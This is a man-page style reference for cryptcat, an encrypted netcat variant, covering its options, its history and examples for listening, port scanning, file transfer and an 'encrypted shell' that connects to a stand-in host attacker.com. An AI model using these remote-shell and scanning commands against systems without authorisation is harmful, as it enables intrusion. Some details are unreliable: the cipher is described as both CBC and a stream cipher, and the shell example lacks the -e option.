cryptcat

[l]isten on a specified [p]ort and print any data received

$ cryptcat -k [password] -l -p [port]

$ cryptcat -k [password] [ip_address] [port]

$ cryptcat -k [password] -w [timeout_in_seconds] [ip_address] [port]

$ cryptcat -v -z [ip_address] [port]

$ cryptcat -k [password] -l -p [local_port] | cryptcat -k [password] [hostname] [remote_port]

cryptcat [options] [host] [port]

-k
    Pre-shared passphrase for Twofish encryption (required for secure mode)

-l
    Listen mode for incoming connections

-p
    Local port number

-e
    Execute program after connect/bind

-u
    Use UDP protocol instead of TCP

-v
    Verbose output (use -vv for more)

-n
    Numeric IP addresses only (no DNS)

-z
    Zero-I/O mode for port scanning

-w
    Timeout for connects/read writes

-s
    Local source address

-o
    Hex dump traffic to file

-r
    Randomize local/remote ports

-i
    Delay interval for lines sent

-h
    Display help summary

-C
    Send CRLF as line ending

Cryptcat is an enhanced version of the classic netcat (nc) utility, providing TCP/IP or UDP network connections with built-in encryption via the Twofish block cipher. It enables secure data transfer, remote shells, port forwarding, and scanning over untrusted networks. Both endpoints must share the same passphrase specified with -k, which generates session keys for encrypting all traffic bidirectionally.

Key features mirror netcat: listen for connections, bind ports, execute programs post-connect, UDP support, verbose logging, timeouts, and zero-I/O scanning. Unlike plain netcat, cryptcat ensures confidentiality without external tools like stunnel or SSH, though it's stream-oriented and lacks authentication (relies solely on pre-shared key).

Typical use: Server side: cryptcat -l -p 4444 -k 'secretkey'
Client side: cryptcat attacker.com 4444 -k 'secretkey'
Type commands for an encrypted shell. Ideal for penetration testing, quick tunnels, or legacy systems, but modern alternatives like SSH are preferred for production.

Key must match exactly on both ends; weak passphrases risk brute-force. No built-in authentication or replay protection. Stream cipher vulnerable to certain attacks if misused. Not FIPS-compliant; avoid for sensitive data. Rarely packaged in distros—compile from source.

Twofish-256 in CBC mode with key derivation from passphrase via EVP_BytesToKey. IV auto-generated per session. All data encrypted post-handshake.

Server: cryptcat -l -p 12345 -k 'pass' > file.txt
Client: cryptcat server 12345 -k 'pass' < localfile.txt

Developed in 2001 by Rob Hughes ('Catatonic') as a netcat extension. Based on original netcat by Hobbit (1995). Uses Twofish cipher (1998 AES finalist by Schneier et al.). Popular in infosec tools like BackTrack/Kali but declined with SSH rise; last major updates ~2004.

nc(1), ncat(1), socat(1), netcat(1), ssh(1)